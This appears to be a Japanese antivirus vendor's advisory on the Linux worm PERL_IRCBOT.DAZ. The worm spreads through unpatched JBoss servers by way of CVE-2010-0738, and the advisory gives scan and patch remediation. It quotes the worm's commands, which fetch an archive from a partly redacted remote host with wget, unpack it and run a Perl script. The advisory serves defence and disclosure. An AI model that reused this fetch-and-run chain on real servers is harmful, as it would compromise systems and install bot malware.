PERL_IRCBOT.DAZ
Linux
マルウェアタイプ:
ワーム
破壊活動の有無:
なし
暗号化:
なし
感染報告の有無 :
はい
概要
ワームは、特定の脆弱性を利用し、パッチが適用されていないJBossサーバを介して感染活動を行います。
ワームは、他のマルウェアに作成されるか、悪意あるWebサイトからユーザが誤ってダウンロードすることによりコンピュータに侵入します。
ワームは、ソフトウェアに存在する脆弱性を利用して、ネットワーク上で感染活動をします。
詳細
侵入方法
ワームは、他のマルウェアに作成されるか、悪意あるWebサイトからユーザが誤ってダウンロードすることによりコンピュータに侵入します。
感染活動
ワームは、以下のソフトウェアに存在する脆弱性を利用して、ネットワーク上で感染活動をします。
- CVE-2010-0738
その他
セキュリティ対策の面からも以下の説明をご参照ください。
その他
ワームは、以下の脆弱性を利用し、パッチが適用されていないJBOSSサーバを介して感染活動を行います。
- Red Hatが提供する「JBoss Enterprise Application Platform」のJMX コンソールの問題により、セキュリティ認証が回避される脆弱性
ワームは、脆弱性が存在するシステム内に不正なJSPページを作成し、以下のコマンドを実行します。JSPは、HTMLにJavaコードを埋め込み、動的にWebページを生成する技術です。
- # wget http://{BLOCKED}tick.{BLOCKED}-remote.com/kisses.tar.gz
- # tar xzvf kisses.tar.gz
- # perl linda.pl
対応方法
手順 1
最新のバージョン(エンジン、パターンファイル)を導入したウイルス対策製品を用い、ウイルス検索を実行してください。「PERL_IRCBOT.DAZ」と検出したファイルはすべて削除してください。 検出されたファイルが、弊社ウイルス対策製品により既に駆除、隔離またはファイル削除の処理が実行された場合、ウイルスの処理は完了しており、他の削除手順は特にありません。
手順 2
以下の修正パッチをダウンロードし適用します。この脆弱性に対する修正パッチを適用するまで、該当製品の使用をお控えください。この製品の製造元が公開する正式な修正パッチをダウンロードし適用することをお勧めします。
セキュリティ対策の面からも以下の説明を参照してください。(英語情報のみ)
ご利用はいかがでしたか? アンケートにご協力ください